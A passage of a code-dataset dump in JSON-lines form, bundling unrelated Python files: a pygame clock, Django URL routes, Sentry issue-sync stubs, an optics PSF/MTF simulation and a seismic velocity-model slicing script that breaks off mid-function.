zip(_get_BLEU_scores(eng_decoded, eng, google_refs, n), bps)]\n else:\n evals = [bp*(pn*(prevpn/bp)**(n-1))**(1/n) for (pn, bp, prevpn) in zip(_get_BLEU_scores(eng_decoded, eng, google_refs, n), bps, all_evals[-1])]\n for v in evals:\n f.write(f\"\\t{v:1.4f}\")\n\n f.write(f\"\\nMean of BLEU scores:\\t{sum(evals)/len(evals):1.4f}\")\n all_evals.append(evals)\n\n f.write(\"\\n\\n\")\n\n f.write(\"-\" * 10 + \"Evaluation END\" + \"-\" * 10 + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Use parser for debugging if needed\")\n args = parser.parse_args()\n\n main(args)\n","sub_path":"CSC2511_Natural_Language_Processing/a2/bonus3_seq_to_seq.py","file_name":"bonus3_seq_to_seq.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242267460","text":"import time\nimport pygame as pg\n\npg.init()\n\ngame_display = pg.display.set_mode((450, 130))\npg.display.set_caption(\"CLOCK\")\nnow = time.localtime()\nprint(time.localtime())\nhours = now[3]\nminutes = now[4]\nseconds = now[5]\nprint(str(hours) + \":\" + str(minutes) + \":\" + str(seconds))\ndot = \":\"\nclock_tick = pg.time.Clock()\n# Colors\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\n\ndef clock():\n global seconds\n global hours\n global minutes\n timi = str(hours).zfill(2) + dot + str(minutes).zfill(2) + dot + str(seconds).zfill(2)\n seconds += 1\n time.sleep(1)\n if seconds == 60:\n seconds = 00\n minutes += 1\n if minutes == 60:\n minutes = 0\n hours += 1\n if hours == 24:\n hours = 00\n font = pg.font.Font(None, 150)\n timi_render = font.render(timi, 1, white)\n game_display.fill(black)\n game_display.blit(timi_render, (10, 10))\n\n\na = 1\nwhile a == 1:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n a = 2\n clock()\n pg.display.flip()\n clock_tick.tick(60)\n\npg.quit()\nquit()\n","sub_path":"working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"607320770","text":"import unittest\n\nimport semantic_version\n\nfrom unimport.constants import DESCRIPTION, VERSION\n\n\nclass MetadataTestCase(unittest.TestCase):\n def test_description(self):\n self.assertIsInstance(DESCRIPTION, str)\n self.assertGreater(len(DESCRIPTION), 0, \"Too short description.\")\n\n def test_version(self):\n # It follows strictly the 2.0.0 version of the SemVer scheme.\n # For more information: https://semver.org/spec/v2.0.0.html\n self.assertIsInstance(VERSION, str)\n self.assertTrue(\n semantic_version.validate(VERSION), \"Invalid semantic-version.\"\n )\n","sub_path":"tests/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"475891111","text":"from django.urls import path\n\nfrom .views import (\n SaveListAPIView, \n SaveCountAPIView,\n IsSaved,\n SaveLatestListAPIView,\n SaveRetrieveAPIView,\n SaveCreateAPIView,\n SaveUpdateAPIView,\n SaveDeleteAPIView,\n UnsaveAPIView,\n)\n\nurlpatterns = [\n path('/unsave//',UnsaveAPIView.as_view(),name='unsave-api'),\n path('/saves//',IsSaved.as_view(),name='save-check-api'),\n path('/saves/',SaveListAPIView.as_view(),name='save-list-api'),\n path('create/',SaveCreateAPIView.as_view(),name='save-create-api'),\n\n ###### not used right now ######\n 
path('/saves/count/',SaveCountAPIView.as_view(),name='save-count-api'),\n path('/saves/latest/',SaveLatestListAPIView.as_view(),name='save-latest-list-api'),\n path('/update//',SaveUpdateAPIView.as_view(),name='save-update-api'),\n path('/delete//',SaveDeleteAPIView.as_view(),name='save-delete-api'),\n]","sub_path":"backend/outreach/save/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"632983043","text":"from __future__ import absolute_import\n\nimport six\n\nfrom sentry.models import Event\nfrom sentry.utils.http import absolute_uri\nfrom sentry.utils.safe import safe_execute\n\n\nclass IssueSyncMixin(object):\n def get_group_title(self, group, event, **kwargs):\n return event.error()\n\n def get_group_body(self, group, event, **kwargs):\n result = []\n for interface in six.itervalues(event.interfaces):\n output = safe_execute(interface.to_string, event, _with_transaction=False)\n if output:\n result.append(output)\n return '\\n\\n'.join(result)\n\n def get_group_description(self, group, event, **kwargs):\n output = [\n absolute_uri(group.get_absolute_url()),\n ]\n body = self.get_group_body(group, event)\n if body:\n output.extend([\n '',\n '```',\n body,\n '```',\n ])\n return '\\n'.join(output)\n\n def get_create_issue_config(self, group, **kwargs):\n \"\"\"\n These fields are used to render a form for the user,\n and are then passed in the format of:\n\n >>>{'title': 'TypeError: Object [object Object] has no method \"updateFrom\"''}\n\n to `create_issue`, which handles creation of the issue\n in JIRA, VSTS, Github, etc\n \"\"\"\n event = group.get_latest_event()\n if event is not None:\n Event.objects.bind_nodes([event], 'data')\n\n return [\n {\n 'name': 'title',\n 'label': 'Title',\n 'default': self.get_group_title(group, event, **kwargs),\n 'type': 'string',\n }, {\n 'name': 'description',\n 'label': 'Description',\n 'default': self.get_group_description(group, event, **kwargs),\n 'type': 'textarea',\n }\n ]\n\n def get_link_issue_config(self, group, **kwargs):\n \"\"\"\n Used by the `GroupIntegrationDetailsEndpoint` to\n create an `ExternalIssue` using title/description\n obtained from calling `get_issue` described below.\n \"\"\"\n return [\n {\n 'name': 'externalIssue',\n 'label': 'Issue',\n 'default': '',\n 'type': 'string',\n }\n ]\n\n def create_issue(self, data, **kwargs):\n \"\"\"\n Create an issue via the provider's API and return the issue key,\n title and description.\n\n Should also handle API client exceptions and reraise as an\n IntegrationError (using the `message_from_error` helper).\n\n >>> def create_issue(self, data, **kwargs):\n >>> resp = self.get_client().create_issue(data)\n >>> return {\n >>> 'key': resp['id'],\n >>> 'title': resp['title'],\n >>> 'description': resp['description'],\n >>> }\n \"\"\"\n raise NotImplementedError\n\n def get_issue(self, issue_id, **kwargs):\n \"\"\"\n Get an issue via the provider's API and return the issue key,\n title and description.\n\n Should also handle API client exceptions and reraise as an\n IntegrationError (using the `message_from_error` helper).\n\n >>> def get_issue(self, data, **kwargs):\n >>> resp = self.get_client().get_issue(issue_id)\n >>> return {\n >>> 'key': resp['id'],\n >>> 'title': resp['title'],\n >>> 'description': resp['description'],\n >>> }\n \"\"\"\n raise NotImplementedError\n\n def sync_assignee_outbound(self, external_issue, user, assign=True, **kwargs):\n \"\"\"\n 
Propagate a sentry issue's assignee to a linked issue's assignee.\n        If assign=True, we're assigning the issue. Otherwise, deassign.\n        \"\"\"\n        raise NotImplementedError\n\n    def sync_status_outbound(self, external_issue, is_resolved, **kwargs):\n        \"\"\"\n        Propagate a sentry issue's status to a linked issue's status.\n        \"\"\"\n        raise NotImplementedError\n","sub_path":"src/sentry/integrations/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"129905682","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\n# Every PyQt5 application must have an application object; sys.argv is the list of command-line arguments\napp = QApplication(sys.argv)\n\n# create a window object\nw = QWidget()\n# set the window size\nw.resize(800, 600)\n# set the window position on the screen\nw.move(300, 300)\n# show the window\nw.show()\n\n# the main loop receives events from the window and dispatches them to the application widgets\nsys.exit(app.exec_())","sub_path":"pyqt5/01_main_window.py","file_name":"01_main_window.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"269923653","text":"#!/usr/bin/python\n\n\"\"\"\nOracle libraries in schema\n\"\"\"\n\nimport sys\nfrom lib_properties import pc\nimport lib_oracle\nimport lib_common\n\nfrom sources_types.oracle import schema as oracle_schema\nfrom sources_types.oracle import library as oracle_library\n\ndef Main():\n\tcgiEnv = lib_oracle.OracleEnv()\n\n\toraSchema = cgiEnv.m_entity_id_dict[\"Schema\"]\n\n\tgrph = cgiEnv.GetGraph()\n\n\tsql_query = \"SELECT OBJECT_NAME,STATUS,CREATED FROM ALL_OBJECTS WHERE OBJECT_TYPE = 'LIBRARY' AND OWNER = '\" + oraSchema + \"'\"\n\tsys.stderr.write(\"sql_query=%s\\n\" % sql_query )\n\n\tnode_oraschema = oracle_schema.MakeUri( cgiEnv.m_oraDatabase, oraSchema )\n\n\tresult = lib_oracle.ExecuteQuery( cgiEnv.ConnectStr(), sql_query)\n\n\tfor row in result:\n\t\tlibraryName = str(row[0])\n\t\tnodeLibrary = oracle_library.MakeUri( cgiEnv.m_oraDatabase , oraSchema, libraryName )\n\t\tgrph.add( ( node_oraschema, pc.property_oracle_library, nodeLibrary ) )\n\n\t\tlib_oracle.AddLiteralNotNone(grph,nodeLibrary,\"Status\",row[1])\n\t\tlib_oracle.AddLiteralNotNone(grph,nodeLibrary,\"Creation\",row[2])\n\n\tcgiEnv.OutCgiRdf(\"LAYOUT_RECT\",[pc.property_oracle_library])\n\nif __name__ == '__main__':\n\tMain()\n","sub_path":"survol/sources_types/oracle/schema/oracle_schema_libraries.py","file_name":"oracle_schema_libraries.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276960263","text":"import jieba\nimport jieba.posseg as pseg\nimport hanlp\n\ndef get_per_list(text):\n    recognizer = hanlp.load(hanlp.pretrained.ner.MSRA_NER_BERT_BASE_ZH)\n    recognizer_results = recognizer.predict(list(text))\n    name_list = []\n    for resultParam in recognizer_results:\n        if resultParam[1] == 'NR':\n            name_list.append(resultParam[0])\n    return name_list\n\ndef get_loc_list(text):\n    _list = []\n    word_list = jieba.lcut(text)\n    for word in word_list:\n        if len(word)==1: # without this check it crashes\n            continue\n        words = pseg.cut(word, use_paddle=True) # paddle mode\n        word, flag = list(words)[0]\n        if flag=='LOC' or flag == 'ns': # 'LOC' here means a place name\n            _list.append(word)\n    _list = list(set(_list))\n    return _list\n","sub_path":"python/nlp/nbtest/utils/NlpUtils.py","file_name":"NlpUtils.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"78931570","text":"# -*- 
coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 7 12:47:00 2021\n\n@author: Sean\n\"\"\"\nfrom math import ceil\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom prysm.propagation import psf_sample_to_pupil_sample, Wavefront\nfrom prysm.coordinates import make_xy_grid, cart_to_polar\nfrom prysm.geometry import circle\nfrom prysm.otf import mtf_from_psf\nfrom prysm.objects import slantededge, siemensstar\nfrom prysm.convolution import conv\nfrom prysm.polynomials import zernike_nm\nfrom prysm.detector import bindown\n\noutput_res = 100\nwlen = 0.550\npixel_pitch = 4.5\nf = 50\nfno = 4\nlens_D = f/fno\nlens_R = lens_D/2\n\n# The above specification determine a Q of:\nQ = (wlen)*(fno)/pixel_pitch\n\n# Need Q_forward >= 2 for forward model, so Q_forward = Q*(oversampling) = 2\noversampling = ceil(2/Q)\nQ_forward = round(Q*oversampling, 1)\n\n# Intermediate higher res gives psize = pixel_pitch/oversampling\npsize = pixel_pitch/oversampling\n\n# PSF_domain_res will be output_res*oversampling\n# Pupil domain samples will be (PSF_domain_res)/Q_forward\nsamples = ceil(output_res*oversampling/Q_forward)\n\n# Find pupil dx from wanted psize\npup_dx = psf_sample_to_pupil_sample(psize, samples, wlen, f)\n\n# Construct pupil grid, convert to polar, construct normalized r for phase\nxi, eta = make_xy_grid(samples, dx=pup_dx)\nr, theta = cart_to_polar(xi, eta)\nnorm_r = r/lens_R\n\n# Construct amplitude function of pupil function\namp = circle(lens_R, r)\namp = amp / amp.sum()\n\n# Construct phase mode\naber = zernike_nm(4, 0, norm_r, theta) # spherical aberration\n# Scale phase mode to desired opd\nphase = aber * wlen/16 * 1e3\n\n# Construct pupil function from amp and phase functions, propagate to PSF plane, take square modulus.\nP = Wavefront.from_amp_and_phase(amp, phase, wlen, pup_dx)\ncoherent_PSF = P.focus(f, Q=Q_forward)\nPSF = coherent_PSF.intensity\n\n# Plot PSF\nPSF_radius = 1.22*wlen*fno\nPSF.plot2d(xlim=5*PSF_radius, cmap='gray', clim=(0, .1))\n\n# Hist of PSF\n# hist = plt.hist(np.histogram(PSF.data))\n\n# Construct MTF from PSF\nMTF = mtf_from_psf(PSF, PSF.dx)\n\nfx, _ = MTF.slices().x\nfig, ax = MTF.slices().plot(['x', 'y', 'azavg'], xlim=(0,50), ylim=(0.7,1))\n# ax.plot(fx, ls=':', c='k', alpha=0.75, zorder=1)\n# ax.axvline(1000/(2*pixel_pitch))\n# ax.axvline(50)\n# ax.axhline(0.8)\nax.set(xlabel='Spatial frequency, cy/mm', ylabel='MTF')\n\n# Constuct sample grid for edge/star test patterns\nx,y = make_xy_grid(shape=PSF.data.shape[0], dx=PSF.dx)\nrho, t = cart_to_polar(x, y)\n\n# Construct slanted edge and Siemen's star test patterns\n# Edge simulation should be done at ~100 output res\n# Star simulation should be done at ~512 output res\nedge = slantededge(x, y)\n# star = siemensstar(rho, t, 40, oradius=x.max()*0.8)\n\n# Blur images by convolving with PSF\nconvedge = conv(edge, PSF.data)\n# convstar = conv(star, PSF.data)\n\n# Resample to output resolution\nedge_image = bindown(convedge, oversampling)\n# star_image = bindown(convstar, oversampling)\n\n# Plot edge test pattern and blurred image\nfig, axes = plt.subplots(ncols=2, figsize=(10,10))\naxes[0].imshow(edge, cmap='gray')\naxes[1].imshow(edge_image, cmap='gray')\n\n# Plot star test pattern and blurred image\n# fig, axes = plt.subplots(ncols=2, figsize=(10,10))\n# axes[0].imshow(star, cmap='gray')\n# axes[1].imshow(star_image, cmap='gray')\n","sub_path":"Image Simulation.py","file_name":"Image 
Simulation.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426327140","text":"#!/usr/bin/env python\n#\n# ----------------------------------------------------------------------\n#\n# Brad T. Aagaard\n# U.S. Geological Survey\n#\n# ----------------------------------------------------------------------\n#\n\nimport os\nimport numpy\nfrom importlib import import_module\nimport logging\nimport configparser\n\nimport matplotlib.pyplot as pyplot\nimport matplotlib.colors as colors\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\nfrom osgeo import osr\nfrom cartopy import crs\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nfrom cartopy_extra_tiles import cached_tiler\nfrom cartopy_extra_tiles import scale_bar\nimport matplotlib_extras\n\nNO_DATA_VALUE = -999.0\n\n# ----------------------------------------------------------------------\ndef _config_get_list(list_string):\n \"\"\"Convert list as string to list.\n\n :type list_string: list\n :param list_string: List as string.\n :returns: List of strings.\n \"\"\"\n l = [f.strip() for f in list_string[1:-1].split(\",\")]\n return l\n\n\n# ----------------------------------------------------------------------\nclass SlicesApp(object):\n \"\"\"Extract slices from USGS CenCalVM 3-D seismic velocity model.\n \"\"\"\n \n def __init__(self):\n \"\"\"Constructor.\n \"\"\"\n self.config = None\n\n self.velCmap = \"plasma_r\" #\"viridis\" # plasma\n self.velNorm = colors.LogNorm(vmin=200.0, vmax=8000.0)\n self.velContours = [250.0, 500.0, 1000.0, 2000.0, 4000.0, 8000.0]\n return\n\n def main(self):\n \"\"\"Main entry point\n \"\"\"\n # Initialization\n args = self._parseCommandLine()\n logLevel = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(level=logLevel, filename=\"slicer.log\")\n if args.show_progress:\n self.showProgress = True\n self.initialize(args.config.split(\",\"))\n\n if args.show_parameters:\n self.show_parameters()\n\n if args.query:\n self.query()\n\n if args.plot_hslices:\n self.plot_hslices()\n\n if args.plot_vslices:\n self.plot_vslices()\n return\n\n def query(self):\n \"\"\"Query seismic velocity model.\n \"\"\"\n import subprocess\n import io\n\n config = os.path.expanduser(self.config[\"ucvm\"][\"config\"])\n model = self.config[\"domain\"][\"model\"]\n env = self.config[\"ucvm.environment\"]\n \n slices = _config_get_list(self.config[\"horiz_slices\"][\"slices\"])\n for label in slices:\n z_flag = \"ge\" if self.config[label][\"z_coordinate\"] == \"elevation\" else \"gd\"\n points = self.hslice_points(label)\n\n points_string = io.BytesIO()\n numpy.savetxt(points_string, points, fmt=\"%12.4f\")\n \n cmd = [\"ucvm_query\", \"-f\", config, \"-m\", model, \"-c\", z_flag]\n result = subprocess.run(cmd, input=points_string.getvalue(), env=env, stdout=subprocess.PIPE)\n\n data = numpy.loadtxt(result.stdout.decode().split(\"\\n\"), usecols=(14,15,16))\n self.save_slice(\"horiz_slice\", label, points, data)\n\n # Vertical slices\n #slices = _config_get_list(self.config[\"vert_slices\"][\"slices\"])\n #for label in slices:\n # (points, distH, elev) = self.vslice_points(label)\n # npoints = points.shape[0]\n # # :TODO: ADD STUFF HERE\n # self.save_slice(\"vert_slice\", label, points, data)\n return\n\n def plot_hslices(self):\n pyplot.style.use([\"color-lightbg\", \"size-presentation\"])\n slices = _config_get_list(self.config[\"horiz_slices\"][\"slices\"])\n for label 
in slices:\n self.plot_hslice(label)\n return\n \n def plot_vslices(self):\n pyplot.style.use([\"color-lightbg\", \"size-presentation\"])\n slices = _config_get_list(self.config[\"vert_slices\"][\"slices\"])\n for label in slices:\n self.plot_vslice(label)\n return\n \n def hslice_points(self, label):\n \"\"\"Generate points for horizontal slice.\n \"\"\"\n lonMin = float(self.config[\"horiz_slices\"][\"longitude_min\"])\n lonMax = float(self.config[\"horiz_slices\"][\"longitude_max\"])\n \n latMin = float(self.config[\"horiz_slices\"][\"latitude_min\"])\n latMax = float(self.config[\"horiz_slices\"][\"latitude_max\"])\n\n res = float(self.config[\"horiz_slices\"][\"resolution_deg\"])\n \n z0 = float(self.config[label][\"z_m\"])\n\n lon1 = numpy.arange(lonMin, lonMax+0.1*res, res, dtype=numpy.float64)\n lat1 = numpy.arange(latMin, latMax+0.1*res, res, dtype=numpy.float64)\n\n logger = logging.getLogger(__name__)\n logger.info(\"Slice {}: numLon={}, numLat={}.\".format(label, lon1.shape[-1], lat1.shape[-1]))\n \n lon, lat = numpy.meshgrid(lon1, lat1)\n z = z0 * numpy.ones(lon.shape, dtype=numpy.float64)\n points = numpy.vstack((lon.ravel(), lat.ravel(), z.ravel(),)).transpose()\n return points\n\n def vslice_points(self, label):\n \"\"\"Generate points for vertical slice.\n \"\"\"\n lonStart = float(self.config[label][\"longitude_start\"])\n lonEnd = float(self.config[label][\"longitude_end\"])\n latStart = float(self.config[label][\"latitude_start\"])\n latEnd = float(self.config[label][\"latitude_end\"])\n resH = float(self.config[\"vert_slices\"][\"resolution_horiz_m\"])\n\n elevMax = 1000.0 * float(self.config[\"vert_slices\"][\"elevation_max_km\"])\n elevMin = 1000.0 * float(self.config[\"vert_slices\"][\"elevation_min_km\"])\n resV = float(self.config[\"vert_slices\"][\"resolution_vert_m\"])\n\n dist = self.distance(lonStart, latStart, numpy.array([lonEnd]), numpy.array([latEnd]))\n nptsH = 1 + int(0.5 + dist / resH)\n nptsV = 1 + int(0.5 + (elevMax - elevMin) / resV)\n lon1 = numpy.linspace(lonStart, lonEnd, nptsH)\n lat1 = numpy.linspace(latStart, latEnd, nptsH)\n elev = numpy.linspace(elevMax, elevMin, nptsV)\n distH = self.distance(lonStart, latStart, lon1, lat1)\n\n points = numpy.zeros((nptsH*nptsV, 3), dtype=numpy.float64)\n points[:,0] = numpy.repeat(lon1, nptsV)\n points[:,1] = numpy.repeat(lat1, nptsV)\n points[:,2] = numpy.array(elev.tolist()*nptsH)\n return (points, distH, elev)\n\n def distance(self, refLon, refLat, ptsLon, ptsLat):\n \"\"\"Get great circle distance in meters from reference point to points.\n\n Source: https://en.wikipedia.org/wiki/Great-circle_distance\n\n :type refLon: float\n :param refLon: Longitude of reference point in degrees.\n\n :type refLat: float\n :param refLat: Latitude of reference point in degrees.\n\n :type ptsLon: Numpy array\n :param ptsLon: Longitude of points in degrees.\n\n :type ptsLat: Numpy array\n :param ptsLat: Latitude of points in degrees.\n \"\"\"\n EARTH_MEAN_RADIUS_M = 6371.0e+3\n DEG_TO_RAD = numpy.pi / 180.0\n\n refLonR = refLon * DEG_TO_RAD\n refLatR = refLat * DEG_TO_RAD\n ptsLonR = ptsLon * DEG_TO_RAD\n ptsLatR = ptsLat * DEG_TO_RAD\n\n p = numpy.sin(0.5*(ptsLatR-refLatR))**2 \\\n + numpy.cos(refLatR)*numpy.cos(ptsLatR)*numpy.sin(0.5*(ptsLonR-refLonR))**2\n return EARTH_MEAN_RADIUS_M * 2.0*numpy.arcsin(p**0.5)\n\n def save_slice(self, sliceType, label, points, data):\n \"\"\"Save slice to file.\n \"\"\"\n header = [\"longitude(deg),latitude(deg),elevation(m),Vp(m/s),Vs(m/s),Density(kg/m**3)\"]\n\n domain = 
self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, sliceType, label)\n values = numpy.vstack((points[:,0], points[:,1], points[:,2], data[:,0], data[:,1], data[:,2])).transpose()\n numpy.savetxt(os.path.join(\"data\", filename), values, fmt=\"%.4f, %.4f, %.1f, %.1f, %.1f, %.1f\", header=\"\\n\".join(header))\n return\n\n def create_basemap(self, dataExtent):\n tilerPath = self.config[\"maps\"][\"tiler\"].split(\".\")\n tilerObj = getattr(import_module(\".\".join(tilerPath[:-1])), tilerPath[-1])\n tilerStyle = self.config[\"maps\"][\"tiler_style\"]\n tilerZoom = int(self.config[\"maps\"][\"zoom_level\"])\n tilesDir = self.config[\"maps\"][\"tiler_cache_dir\"]\n tiler = cached_tiler.CachedTiler(tilerObj(desired_tile_form=\"L\", style=tilerStyle), cache_dir=tilesDir)\n \n figWidthIn = float(self.config[\"maps\"][\"width_in\"])\n figHeightIn = float(self.config[\"maps\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=300)\n\n rectFactory = matplotlib_extras.axes.RectFactory(figure, margins=((0.45, 0, 0.05), (0.30, 0, 0.25)))\n ax = figure.add_axes(rectFactory.rect(), projection=tiler.crs)\n ax.set_extent(dataExtent)\n ax.add_image(tiler, tilerZoom, zorder=0, cmap=\"gray\")\n\n tickSpacingDeg = float(self.config[\"maps\"][\"tick_spacing_deg\"])\n gridlines = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True, linewidth=0.5, alpha=0.2)\n gridlines.xlabels_top = False\n gridlines.xlabels_bottom = True\n gridlines.ylabels_left = True\n gridlines.ylabels_right = False\n gridlines.xformatter = LONGITUDE_FORMATTER\n gridlines.yformatter = LATITUDE_FORMATTER\n gridlines.xlocator = ticker.MultipleLocator(tickSpacingDeg)\n gridlines.ylocator = ticker.MultipleLocator(tickSpacingDeg)\n\n scale_bar.scale_bar(ax, (0.04, 0.93), int(self.config[\"maps\"][\"scale_bar_km\"]), zorder=7, linewidth=2)\n return figure\n \n def plot_hslice(self, label):\n COLORBAR_AXES = [0.15, 0.08, 0.02, 0.33]\n \n res = float(self.config[\"horiz_slices\"][\"resolution_deg\"])\n\n domain = self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, \"horiz_slice\", label)\n data = numpy.loadtxt(os.path.join(\"data\", filename), delimiter=\",\")\n\n lonMin, lonMax = numpy.min(data[:,0]), numpy.max(data[:,0])\n latMin, latMax = numpy.min(data[:,1]), numpy.max(data[:,1])\n numLon = 1 + int(0.5 + (lonMax - lonMin) / res)\n numLat = 1 + int(0.5 + (latMax - latMin) / res)\n gridShape = (numLat, numLon)\n\n lon = data[:,0].reshape(gridShape)\n lat = data[:,1].reshape(gridShape)\n elev = data[:,2].reshape(gridShape)\n vp = numpy.ma.masked_values(data[:,3].reshape(gridShape), NO_DATA_VALUE)\n vs = numpy.ma.masked_values(data[:,4].reshape(gridShape), NO_DATA_VALUE)\n density = numpy.ma.masked_values(data[:,5].reshape(gridShape), NO_DATA_VALUE)\n \n dataExtent = [lonMin, lonMax, latMin, latMax]\n dataCRS = crs.PlateCarree()\n\n # Vs\n figure = self.create_basemap(dataExtent)\n ax = figure.gca()\n im = ax.imshow(vs, norm=self.velNorm, extent=dataExtent, transform=dataCRS, origin=\"lower\", cmap=self.velCmap, alpha=0.5, zorder=2)\n \n ax.set_title(\"Vs\")\n cbax = figure.add_axes(COLORBAR_AXES)\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vs (m/s)\")\n\n filename = \"{}-horiz_slice-{}_map_vs.jpg\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n \n # Vp\n figure = 
self.create_basemap(dataExtent)\n ax = figure.gca()\n im = ax.imshow(vp, norm=self.velNorm, extent=dataExtent, transform=dataCRS, origin=\"lower\", cmap=self.velCmap, alpha=0.5, zorder=2)\n\n ax.set_title(\"Vp\")\n cbax = figure.add_axes(COLORBAR_AXES)\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vp (m/s)\")\n\n filename = \"{}-horiz_slice-{}_map_vp.jpg\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n return\n\n def plot_vslice(self, label):\n (points, distH, elev) = self.vslice_points(label)\n\n domain = self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, \"vert_slice\", label)\n data = numpy.loadtxt(os.path.join(\"data\", filename), delimiter=\",\")\n\n numH = distH.shape[-1]\n numV = elev.shape[-1]\n gridShape = (numH, numV)\n\n vp = numpy.ma.masked_values(data[:,3].reshape(gridShape), NO_DATA_VALUE).transpose()\n vs = numpy.ma.masked_values(data[:,4].reshape(gridShape), NO_DATA_VALUE).transpose()\n density = numpy.ma.masked_values(data[:,5].reshape(gridShape), NO_DATA_VALUE)\n \n distH *= 1.0e-3\n elev *= 1.0e-3\n dataExtent = [numpy.min(distH), numpy.max(distH), numpy.min(elev), numpy.max(elev)]\n \n # Vs\n figWidthIn = float(self.config[\"profiles\"][\"width_in\"])\n figHeightIn = float(self.config[\"profiles\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=150)\n\n figure.subplots_adjust(bottom=0.24, top=0.9, left=0.11, right=0.85)\n ax = pyplot.axes()\n ax.set_aspect(\"equal\")\n im = ax.imshow(vs, norm=self.velNorm, extent=dataExtent, origin=\"upper\", cmap=self.velCmap, zorder=2)\n \n ax.set_title(\"Vs\")\n ax.set_xlabel(\"Distance (km)\")\n ax.set_ylabel(\"Elevation (km)\")\n ax.tick_params(\"both\", direction=\"out\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_major_locator(ticker.MultipleLocator(20.0))\n ax.xaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(10.0))\n ax.yaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n \n cbax = figure.add_axes([0.87, 0.2, 0.02, 0.7])\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vs (m/s)\")\n\n filename = \"{}-vert_slice-{}_vs.png\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n\n # Vp\n figWidthIn = float(self.config[\"profiles\"][\"width_in\"])\n figHeightIn = float(self.config[\"profiles\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=150)\n\n figure.subplots_adjust(bottom=0.24, top=0.9, left=0.11, right=0.85)\n ax = pyplot.axes()\n ax.set_aspect(\"equal\")\n im = ax.imshow(vp, norm=self.velNorm, extent=dataExtent, origin=\"upper\", cmap=self.velCmap, zorder=2)\n \n ax.set_title(\"Vp\")\n ax.set_xlabel(\"Distance (km)\")\n ax.set_ylabel(\"Elevation (km)\")\n ax.tick_params(\"both\", direction=\"out\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_major_locator(ticker.MultipleLocator(20.0))\n ax.xaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n 
